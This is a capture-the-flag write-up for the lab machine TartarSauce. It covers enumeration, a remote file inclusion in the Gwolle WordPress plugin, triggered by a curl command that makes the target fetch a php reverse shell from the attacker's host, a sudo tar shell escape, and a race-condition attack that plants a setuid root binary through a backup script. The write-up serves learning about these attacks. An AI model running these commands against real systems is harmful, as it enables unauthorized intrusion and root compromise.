# TARTARSAUCE | 10.10.10.88

## Initial Enumeration

    sudo nmap -v -T4 -sC -sV -oN nmap-initial 10.10.10.88
    
### Open Ports and Their Services

* 80 - HTTP - Apache 2.4.18

## Service Enumeration

### 80 - Apache 2.4.18

In the nmap scan we see a robots.txt reference which helpfully gives us some directories to check out:

![](img/nmap-80-enum.png)


OK then, let's check them out one by one.

Actually, the only one that resolves is `/monstra-3.0.4`, and it leads to a default start page:

![](img/tartar.png)

Those links on the right don't lead to anything either.

Searchsploit pulls up a number of potential vulns for this version of monstra:

![](img/monstra.png)

But they are authenticated, and I need to find a login screen first. Gobuster makes short work of it:

![](img/gobuster.png)

On a lark, I try 'admin:admin' and I am in:

![](img/admin.png)

Now those exploits become possible. I will try for an RCE via file upload, and I'll go for the gold right away, using the dependable php-reverse-shell. If that fails, I'll copy what is in the exploit explainer and then paste in a code for a reverse shell.

![](img/searchsploit.png)

I tried all ways of doing it, not just the reverse shell file, but even simple php files, following the directions in the exploit explainers, to no avail. I was not able to upload any files at all. That and so many links were broken that shouldn't be. Maybe this is a patched version of monstra.

I had to go back and run more dirbusting, but one directory backwards. The robots.txt file has all entries as `/webservices/..`, and I just went ahead and trusted that those were the only directories there. Time to go nuclear on it:

    feroxbuster -u http://10.10.10.88/webservices -x php,html,txt -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
    
![](img/wp.png)

OK - a wordpress instance.

![](img/broken-wp.png)

A broken wordpress instance. 

### wpscan

I had to do aggressive detection in the wpscan to find some plugins:

![](img/wp-plugins.png)

And one of them has an RFI vuln:

![](img/ss-gwolle.png)

Even though wpscan says this is version 2.3.10, there is something in the README that suggests otherwise, and so it is vulnerable to the exploit:

![](img/trick.png)

## Foothold via RFI in vulnerable wordpress plugin

So the vuln involves improper sanitiziation in the plugin's captcha implementation, which allows attackers to point an http GET request to an outside source, making it download a malicious php file and execute it.

So now is the time to try that php-reverse-shell. I just have to name it 'wp-load.php'.

Then I can use cURL to trigger the exploit.

    curl -s http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://10.10.14.20/
    
(that forward slash at the end is crucial!)

![](img/www-data-shell.png)

## User Enumeration

The www-data user can't even navigate to the regular user's (onuma) home dir, but they can apparently execute tar as that user:

![](img/sudo-l-www.png)

Let's check GTFO for any leads:

![](img/gtfo-tar.png)

These are helpful, and I have confirmed that the version on the box is GNU tar.

## Privilege Escalation - www-data to onuma via tar

OK, let's try option b first:

    sudo -u onuma tar xf /dev/null -I '/bin/bash -c "bash <&2 1>&2"'
    
![](img/onuma-shell.png)

And here is the flag:

![](img/onuma-flag.png)

## User Enumeration

I don't have this user's password so I can't sudo -l. Let's use linpeas to see what it can find.

### linpeas

* `/usr/sbin/backuperer` with corresponding systemd-timer

![](img/backuperer.png)

![](img/backuperer-timer.png)

This is probably a backup program, and we are able to run it but not modify it.

* wordpress database creds

![](img/wp-creds.png)

There is a mysql db running locally, and these are the credentials. Not sure if useful right now.

* backups folder - possibly related to the backuperer above

![](img/backups-folder.png)

There are a number of files in here; let's take a closer look.

One that stands out is 'onuma-www-dev.bak' - it is quite large and is actually a compressed gzip file:

![](img/zip.png)

It is merely a backup of the `/webservices` dir in the www folder. Let's move back to the 'backuperer' program. 

### backuperer script

It is a bash script:

![](img/script.png)

It backs up the website and does some kind of integrity check in which it creates another directory and compares it to the original (/var/www/html) after waiting for 30 seconds. If there is a difference between the newly-created backup and the original, then it reports the differences and exits. If there is no difference, the backup is moved to the backup dir.

## Privilege Escalation via backuperer

Since the script waits so long (30s) before performing the check, I could wait for the tempfile to be created (which is the initial backup) and then during that 30 second window replace the backup with a malicious file that calls a shell. Then the script creates the check directory and in there should be my root-owned shell file.

First, I need to create a simple C file that does setuid and setgid to root, then calls bash, then returns 0:

![](img/pop.png)

Then, since the system I am attacking is 32-bit, I need to compile it as a 32-bit binary:

    gcc -m32 -o koopa pop.c
    
Next, on my own machine, I need to create the folder structure `var/www/html/` as root and put the binary in there; then setuid the binary so it is owned by root and keeps the correct uid.

Then, tar it in the same way the backuperer script tars the backup:

    tar -czvf hello.tar.gz var/
    
And send it over in the usual way, to the /var/tmp directory.

The next steps are somewhat time-sensitive. I need to wait until the backuperer script gets executed.

![](img/timer.png)

In the /var/tmp dir, a hidden file with alphanumeric characters will appear - that is the backup file. Then I replace the contents with my tar.gz file.

![](img/dir.png)

    cp hello.tar.gz .0f562b3c204ac426b1e5b28e48b2e27e48e1e807
    
Then, after about 30 seconds, a dir named 'check' will appear, and inside that dir will be the extracted contents of the malicious backup, owned by root (because the 'diff' puts whatever differs between the two backups):

![](img/check.png)

The final step is to execute that binary:

![](img/root-shell.png)

The end.

### Flag

![](img/root-flag.png)

## Conclusion

This one took me a while, and I sought help in fully understanding how to exploit it; clearly, I still have a lot to learn. Some people made their own script to do the exploit, but I liked the manual way since it helped me understand a bit better. And the time-sensitive nature of it makes you feel like a hacker racing against the clock!

Steps taken:

* Go down a rabbit hole until I find the wordpress install
* exploit a vulnerable wordpress plugin to get code execution, a php reverse shell
* escalate to another user via tar, escaping restricted env
* escalate to root through taking advantage of a weakness in a backup script
